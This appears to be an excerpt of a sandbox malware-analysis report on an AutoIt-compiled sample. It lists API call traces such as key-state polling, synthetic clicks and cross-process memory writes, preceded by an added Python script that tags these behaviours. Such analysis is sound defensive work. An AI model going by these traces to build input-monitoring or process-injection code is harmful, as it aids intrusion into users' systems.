• Opcode Fuzzy Hash: 3054bda6750122cd8814df3a21bec56e39035004611d723fdc75d1f1f375a11c
• Instruction Fuzzy Hash: FB21DA35B02204ABDB129B649C96FEF7BADEB88710F044066F905DB1D2D670CD518F91
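The function records in this report list raw API calls with hex arguments, which is slow to read across hundreds of entries. The following Python is an added triage example and is not part of the Joe Sandbox report or of the analysed sample: it parses lines in the report's "APIs" list format into per-function records, resolves the Win32 constants that appear in the records above (WM_GETTEXT 0xD, WM_GETTEXTLENGTH 0xE, WM_LBUTTONDOWN 0x201, WM_LBUTTONUP 0x202, LVM_GETITEMCOUNT 0x1004, LVM_GETITEMSTATE 0x102C, VK_LBUTTON 1, VK_RBUTTON 2) and tags each function with a coarse behaviour label. The input is constructed from records shown on this page; the behaviour labels and the `parse_records`/`annotate`/`behaviours` names are the example's own choice. Only the message slot of SendMessageW/PostMessageW is interpreted, because the trailing arguments the plugin prints for one-argument calls such as Sleep appear to be stale stack contents from the preceding call (compare the Sleep lines above).

```python
"""Parse Joe Sandbox 'APIs' record lines into per-function behaviour tags.

Added example, not Joe Sandbox code. Input lines are constructed from the
record format shown on this page (one record per 'APIs' heading).
"""
import re
from dataclasses import dataclass

# Win32 constants that occur in the records on this page.
WM_NAMES = {
    0x000D: "WM_GETTEXT", 0x000E: "WM_GETTEXTLENGTH",
    0x0201: "WM_LBUTTONDOWN", 0x0202: "WM_LBUTTONUP",
    0x1004: "LVM_GETITEMCOUNT", 0x102C: "LVM_GETITEMSTATE",
}
VK_NAMES = {0x01: "VK_LBUTTON", 0x02: "VK_RBUTTON"}

# Matches '• Name.MODULE(args), ref: ADDR', '• Name.LIBCMT ref: ADDR' and the
# indented '• Part of subcall function ADDR: ...' variant.
LINE_RE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>\w+)\.(?P<mod>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Constructed sample: four records copied from this page's listing format.
SAMPLE = """\
APIs
• GetCursorPos.USER32(?), ref: 002B2357
• ScreenToClient.USER32(003757B0,?), ref: 002B2374
• GetAsyncKeyState.USER32(00000001), ref: 002B2399
• GetAsyncKeyState.USER32(00000002), ref: 002B23A7
APIs
• GetWindowRect.USER32(?,?), ref: 00308A30
• PostMessageW.USER32(?,00000201,00000001), ref: 00308ADA
• Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00308AE2
• PostMessageW.USER32(?,00000202,00000000), ref: 00308AF0
APIs
• IsWindowVisible.USER32(?), ref: 0030B204
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0030B221
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0030B259
• CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0030B27F
• _wcsstr.LIBCMT ref: 0030B289
APIs
  • Part of subcall function 002B9837: __itow.LIBCMT ref: 002B9862
• WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0031E6AC
"""


@dataclass
class ApiCall:
    name: str
    module: str
    args: list        # int for hex values, None for an unknown '?'
    ref: int          # call-site address
    subcall: bool     # True for 'Part of subcall function' lines


def _arg(token):
    token = token.strip()
    return None if token in ("", "?") else int(token, 16)


def parse_records(text):
    """Split the listing at each 'APIs' heading and parse the call lines."""
    records, current = [], None
    for raw in text.splitlines():
        if raw.strip() == "APIs":
            current = []
            records.append(current)
            continue
        m = LINE_RE.match(raw)
        if not m or current is None:
            continue
        args = [_arg(t) for t in m["args"].split(",")] if m["args"] else []
        current.append(ApiCall(m["name"], m["mod"], args,
                               int(m["ref"], 16), m["sub"] is not None))
    return records


def annotate(call):
    """Readable form of one call with message ids and VK codes resolved."""
    a = call.args
    if call.name in ("SendMessageW", "PostMessageW") and len(a) > 1 and a[1] in WM_NAMES:
        return f"{call.name}(hwnd, {WM_NAMES[a[1]]})"
    if call.name == "GetAsyncKeyState" and a and a[0] in VK_NAMES:
        return f"{call.name}({VK_NAMES[a[0]]})"
    return call.name


def behaviours(record):
    """Coarse behaviour tags for one function's API sequence (example's own labels)."""
    tags = set()
    msgs = {c.args[1] for c in record
            if c.name in ("SendMessageW", "PostMessageW") and len(c.args) > 1}
    names = {c.name for c in record}
    if {0x0201, 0x0202} <= msgs:
        tags.add("synthetic mouse click")
    if 0x000D in msgs:
        tags.add("reads window text")
    if {"GetAsyncKeyState", "GetCursorPos"} <= names:
        tags.add("polls mouse position/buttons")
    if any(n.startswith("WritePrivateProfile") for n in names):
        tags.add("writes INI file")
    return tags


if __name__ == "__main__":
    for i, rec in enumerate(parse_records(SAMPLE)):
        print(i, sorted(behaviours(rec)), [annotate(c) for c in rec])
```

Feed the script the whole "APIs" section of a report to get one tag set per function; functions without a recognised pattern come back with an empty set and can be skipped during triage.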

APIs
• IsWindow.USER32(00000000), ref: 00325A6E
• GetForegroundWindow.USER32 ref: 00325A85
• GetDC.USER32(00000000), ref: 00325AC1
• GetPixel.GDI32(00000000,?,00000003), ref: 00325ACD
• ReleaseDC.USER32(00000000,00000003), ref: 00325B08
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: Window$ForegroundPixelRelease
• String ID:
• API String ID: 4156661090-0
• Opcode ID: c8e3228be9b213c08453514e44adab907a7d4109090d0548524ae276e420b712
• Instruction ID: 3f74aeaf8213db85ff9f2d1847549747af3de84653fe7a0e4fd79f481f94c9ed
• Opcode Fuzzy Hash: c8e3228be9b213c08453514e44adab907a7d4109090d0548524ae276e420b712
• Instruction Fuzzy Hash: D421A135A00504AFD705EF65EC89A9ABBF9EF48350F148079F80997362CB34ED40CB90

APIs
• ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 002B134D
• SelectObject.GDI32(?,00000000), ref: 002B135C
• BeginPath.GDI32(?), ref: 002B1373
• SelectObject.GDI32(?,00000000), ref: 002B139C
Similarity
• API ID: ObjectSelect$BeginCreatePath
• String ID:
• API String ID: 3225163088-0
• Opcode ID: 0dc3598a3b94bc5110342bc01b45d8f7a0d1f18fa4fc5d8ca67e31ef5468e473
• Instruction ID: a244b01edc1dc6d5af31e8905cb866aafd3954d6cec5391e6bd1e52d225010a7
• Opcode Fuzzy Hash: 0dc3598a3b94bc5110342bc01b45d8f7a0d1f18fa4fc5d8ca67e31ef5468e473
• Instruction Fuzzy Hash: 14217F30D20609EFDB268F65DD447A93BECEB00351F98426AE814961B1E3B098F1CF51

APIs
• GetCurrentThreadId.KERNEL32 ref: 00314ABA
• __beginthreadex.LIBCMT ref: 00314AD8
• MessageBoxW.USER32(?,?,?,?), ref: 00314AED
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00314B03
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00314B0A
Similarity
• API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
• String ID:
• API String ID: 3824534824-0
• Opcode ID: 3c9c13580fda1005ad2b2ae4e6716d4d9e4e57fb8296fcf9ba0b3c52d7e1f558
• Instruction ID: 0a604ecbc05941d590150c55b4542fe5e60ef3e142d17992e4ab097eb414595d
• Opcode Fuzzy Hash: 3c9c13580fda1005ad2b2ae4e6716d4d9e4e57fb8296fcf9ba0b3c52d7e1f558
• Instruction Fuzzy Hash: 01110C76D08204BFD7179FA8EC44ADB7FACEB49321F144269F814D3251D671CD448BA0

APIs
• GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0030821E
• GetLastError.KERNEL32(?,00307CE2,?,?,?), ref: 00308228
• GetProcessHeap.KERNEL32(00000008,?,?,00307CE2,?,?,?), ref: 00308237
• HeapAlloc.KERNEL32(00000000,?,00307CE2,?,?,?), ref: 0030823E
• GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00308255
Similarity
• API ID: HeapObjectSecurityUser$AllocErrorLastProcess
• String ID:
• API String ID: 842720411-0
• Opcode ID: be3cfab37465a7e0ce67edc5fb9351828df6da76b0655804afaacb18b0cb1bee
• Instruction ID: 41c03e19624115d6c881422b0fb3a6c855f56c07ba10d29a4c65564ed452356d
• Opcode Fuzzy Hash: be3cfab37465a7e0ce67edc5fb9351828df6da76b0655804afaacb18b0cb1bee
• Instruction Fuzzy Hash: 7E016271A01604FFDB124FA6DC88D677B6CEF85754F500829F849C2160DA318C10DA60

APIs
• CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00307044,80070057,?,?,?,00307455), ref: 00307127
• ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00307044,80070057,?,?), ref: 00307142
• lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00307044,80070057,?,?), ref: 00307150
• CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00307044,80070057,?), ref: 00307160
• CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00307044,80070057,?,?), ref: 0030716C
Similarity
• API ID: From$Prog$FreeStringTasklstrcmpi
• String ID:
• API String ID: 3897988419-0
• Opcode ID: 8576d1cd46d56cda0abc2ca59efeb622d0bbfb0fea03a59fedfc4a38c6c6b6f8
• Instruction ID: 836b5bfeaf57489a4f7976d5654e484c2ce412257b827ec6eaf4b693cccb8269
• Opcode Fuzzy Hash: 8576d1cd46d56cda0abc2ca59efeb622d0bbfb0fea03a59fedfc4a38c6c6b6f8
• Instruction Fuzzy Hash: 0A017C76A02204BFDB1A4F64DC84AAA7BBDEB447A1F150065FD08D62A0D731ED41DBA0

APIs
• QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00315260
• QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0031526E
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00315276
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00315280
• Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003152BC
Similarity
• API ID: PerformanceQuery$CounterSleep$Frequency
• String ID:
• API String ID: 2833360925-0
• Opcode ID: a7f0f0d90f2bdf0e2686b3102411b7545abff3647ebebccb1f883c0d1d69929a
• Instruction ID: 6aade422e5b86be4b9796ee3e5fb8f281e1dcb062133a41433b2f8a0dbf65a93
• Opcode Fuzzy Hash: a7f0f0d90f2bdf0e2686b3102411b7545abff3647ebebccb1f883c0d1d69929a
• Instruction Fuzzy Hash: E1015732D01A19DBCF06EFE4E8899EEBB7CBB4D311F810856E945F2140CB3059958BA1

APIs
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00308121
• GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0030812B
• GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0030813A
• HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00308141
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00308157
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
• API String ID: 44706859-0
• Opcode ID: 0964672e0798e417d6289bc31048dc8a6dff8d295cb5091daff51f1256726705
• Instruction ID: 1f2294bd776ac2e18d926a5bba0081cd2f4c403ed50387a89e733d264a08eb82
• Opcode Fuzzy Hash: 0964672e0798e417d6289bc31048dc8a6dff8d295cb5091daff51f1256726705
• Instruction Fuzzy Hash: 1EF06275601304BFEB160FA5ECD8E673BACFF49754F400025F985C61A0CB61DD55DA60

APIs
• GetDlgItem.USER32(?,000003E9), ref: 0030C1F7
• GetWindowTextW.USER32(00000000,?,00000100), ref: 0030C20E
• MessageBeep.USER32(00000000), ref: 0030C226
• KillTimer.USER32(?,0000040A), ref: 0030C242
• EndDialog.USER32(?,00000001), ref: 0030C25C
                                                                                                                    Similarity
                                                                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3741023627-0
                                                                                                                    • Opcode ID: ae1acaf8224d646c454f640a336360cf77e34eec5818e280ab09390a3e3bac52
                                                                                                                    • Instruction ID: 43e43065a64e69c435378ec191ae648acc219cd04bef4687102b1c393b2ccbac
                                                                                                                    • Opcode Fuzzy Hash: ae1acaf8224d646c454f640a336360cf77e34eec5818e280ab09390a3e3bac52
                                                                                                                    • Instruction Fuzzy Hash: E501A730814704ABEB225B60DD9EB96777CBB00705F400669A582918E0D7E469548B50
                                                                                                                    APIs
                                                                                                                    • EndPath.GDI32(?), ref: 002B13BF
                                                                                                                    • StrokeAndFillPath.GDI32(?,?,002EB888,00000000,?), ref: 002B13DB
                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 002B13EE
                                                                                                                    • DeleteObject.GDI32 ref: 002B1401
                                                                                                                    • StrokePath.GDI32(?), ref: 002B141C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2625713937-0
                                                                                                                    • Opcode ID: 4dcad25771a95bd6e94ba09e87eaf3806e7d8cee838206b4ffa17628fa7151ff
                                                                                                                    • Instruction ID: c2418fffedb65881f006ff8f2acb436ba53c5a017d195a3270e06b96d42d8d54
                                                                                                                    • Opcode Fuzzy Hash: 4dcad25771a95bd6e94ba09e87eaf3806e7d8cee838206b4ffa17628fa7151ff
                                                                                                                    • Instruction Fuzzy Hash: 51F0FB30511A09EFDB2B5F1AED887983FA8E701366F488224E429480B2C77045F5DF11
                                                                                                                    APIs
                                                                                                                    • CoInitialize.OLE32(00000000), ref: 0031C432
                                                                                                                    • CoCreateInstance.OLE32(00342D6C,00000000,00000001,00342BDC,?), ref: 0031C44A
                                                                                                                      • Part of subcall function 002B7DE1: _memmove.LIBCMT ref: 002B7E22
                                                                                                                    • CoUninitialize.OLE32 ref: 0031C6B7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                    • String ID: .lnk
                                                                                                                    • API String ID: 2683427295-24824748
                                                                                                                    • Opcode ID: 8eeacf9d7798fcfb95ef91e779258f66e615e918555b4bdceec2ed2e6c121e38
                                                                                                                    • Instruction ID: 078884ebd72948fc9cec780134e6a9a9b646419d1ddfc2384a0c2a570850db05
                                                                                                                    • Opcode Fuzzy Hash: 8eeacf9d7798fcfb95ef91e779258f66e615e918555b4bdceec2ed2e6c121e38
                                                                                                                    • Instruction Fuzzy Hash: 39A14A71214205AFD700EF54C881EABB7ECFF89394F00491CF5559B1A2EB71EA59CB92
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002D0DB6: std::exception::exception.LIBCMT ref: 002D0DEC
                                                                                                                      • Part of subcall function 002D0DB6: __CxxThrowException@8.LIBCMT ref: 002D0E01
                                                                                                                      • Part of subcall function 002B7DE1: _memmove.LIBCMT ref: 002B7E22
                                                                                                                      • Part of subcall function 002B7A51: _memmove.LIBCMT ref: 002B7AAB
                                                                                                                    • __swprintf.LIBCMT ref: 002C2ECD
                                                                                                                    Strings
                                                                                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 002C2D66
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                    • API String ID: 1943609520-557222456
                                                                                                                    • Opcode ID: 870c0b562175254e5a168397471ada355ea9d7919fda3adac0656c8d20cf8616
                                                                                                                    • Instruction ID: 4a09bb1d18b8a059f9dd797e917d00558d87ecae32a60a67b001ec66ec8589d3
                                                                                                                    • Opcode Fuzzy Hash: 870c0b562175254e5a168397471ada355ea9d7919fda3adac0656c8d20cf8616
                                                                                                                    • Instruction Fuzzy Hash: 8F917D31128616DFC714EF24C889DBEB7B4EF85754F00492DF585AB2A1DA30ED68CB52
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002B4743,?,?,002B37AE,?), ref: 002B4770
                                                                                                                    • CoInitialize.OLE32(00000000), ref: 0031B9BB
                                                                                                                    • CoCreateInstance.OLE32(00342D6C,00000000,00000001,00342BDC,?), ref: 0031B9D4
                                                                                                                    • CoUninitialize.OLE32 ref: 0031B9F1
                                                                                                                      • Part of subcall function 002B9837: __itow.LIBCMT ref: 002B9862
                                                                                                                      • Part of subcall function 002B9837: __swprintf.LIBCMT ref: 002B98AC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                    • String ID: .lnk
                                                                                                                    • API String ID: 2126378814-24824748
                                                                                                                    • Opcode ID: 316d19eb3937571115a9d7fdccdcf6b85265db09d20b941c91064cab9450d8d9
                                                                                                                    • Instruction ID: efdfd10414ec9693cc7e323deb5f655859b2235a882d4ac223415389a450a54f
                                                                                                                    • Opcode Fuzzy Hash: 316d19eb3937571115a9d7fdccdcf6b85265db09d20b941c91064cab9450d8d9
                                                                                                                    • Instruction Fuzzy Hash: AAA145756043019FCB05EF14C484D9ABBE5FF89314F058998F9999B3A1CB31EC85CB91
                                                                                                                    APIs
                                                                                                                    • OleSetContainedObject.OLE32(?,00000001), ref: 0030B4BE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ContainedObject
                                                                                                                    • String ID: AutoIt3GUI$Container$%4
                                                                                                                    • API String ID: 3565006973-3553967331
                                                                                                                    • Opcode ID: 8e50ee3b964e3a82beb0e047d79136b9917aba22ce1d2ec1e297207abd3e500a
                                                                                                                    • Instruction ID: 82f98ce5ec2de323cabebb513e11f4661501bdd314065cac0741eef1fbf373e2
                                                                                                                    • Opcode Fuzzy Hash: 8e50ee3b964e3a82beb0e047d79136b9917aba22ce1d2ec1e297207abd3e500a
                                                                                                                    • Instruction Fuzzy Hash: EE916974601601AFDB15CF24C894B6ABBF9FF49700F2084AEF94ACB6A1DB70E841CB50
                                                                                                                    APIs
                                                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 002D50AD
                                                                                                                      • Part of subcall function 002E00F0: __87except.LIBCMT ref: 002E012B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorHandling__87except__start
                                                                                                                    • String ID: pow
                                                                                                                    • API String ID: 2905807303-2276729525
                                                                                                                    • Opcode ID: d1a3ec5979b7b739ef2b9f269375b41b95fc7088c8af3c0814bac842a6cd7f33
                                                                                                                    • Instruction ID: 41eca4ee0224463967b61fa1a364e1538355d4cf96f90cc9d110163675a5795d
                                                                                                                    • Opcode Fuzzy Hash: d1a3ec5979b7b739ef2b9f269375b41b95fc7088c8af3c0814bac842a6cd7f33
                                                                                                                    • Instruction Fuzzy Hash: 2551BC2097C54382DB117F25C88137E2BD49B01301F648D5AE4C98E3A9DFF48DFA9E82
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove
                                                                                                                    • String ID: 3c,$_,
                                                                                                                    • API String ID: 4104443479-370742736
                                                                                                                    • Opcode ID: 8ade6735bbe1b4d26e392e43cf7dadab36c1bacd4e8153530a0e4b310b27765b
                                                                                                                    • Instruction ID: 8042310df4950048cd5ece1fd3f25787fb661522756d0a7e484f9d690e1ef74e
                                                                                                                    • Opcode Fuzzy Hash: 8ade6735bbe1b4d26e392e43cf7dadab36c1bacd4e8153530a0e4b310b27765b
                                                                                                                    • Instruction Fuzzy Hash: FF518DB091061A9FCF20CF68C890ABEFBB1FF44344F148529E95AD7250EB30E965CB51
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 003114BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00309296,?,?,00000034,00000800,?,00000034), ref: 003114E6
                                                                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0030983F
                                                                                                                      • Part of subcall function 00311487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003092C5,?,?,00000800,?,00001073,00000000,?,?), ref: 003114B1
                                                                                                                      • Part of subcall function 003113DE: GetWindowThreadProcessId.USER32(?,?), ref: 00311409
                                                                                                                      • Part of subcall function 003113DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0030925A,00000034,?,?,00001004,00000000,00000000), ref: 00311419
                                                                                                                      • Part of subcall function 003113DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0030925A,00000034,?,?,00001004,00000000,00000000), ref: 0031142F
                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003098AC
                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003098F9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 4150878124-2766056989
                                                                                                                    • Opcode ID: e8c112b1433acaf60052f7d53360c7b89f88f1d2251ad983c025af11eccfa9e7
                                                                                                                    • Instruction ID: 5457c15195991ff3c2a548f8c406ac75f8025b5bad77c5078c847d2c7ba0df77
                                                                                                                    • Opcode Fuzzy Hash: e8c112b1433acaf60052f7d53360c7b89f88f1d2251ad983c025af11eccfa9e7
                                                                                                                    • Instruction Fuzzy Hash: A4415C76901218BFCB15DFA4CD96BDEBBB8EB09700F004199FA55B7181DA706E85CBA0
                                                                                                                    APIs
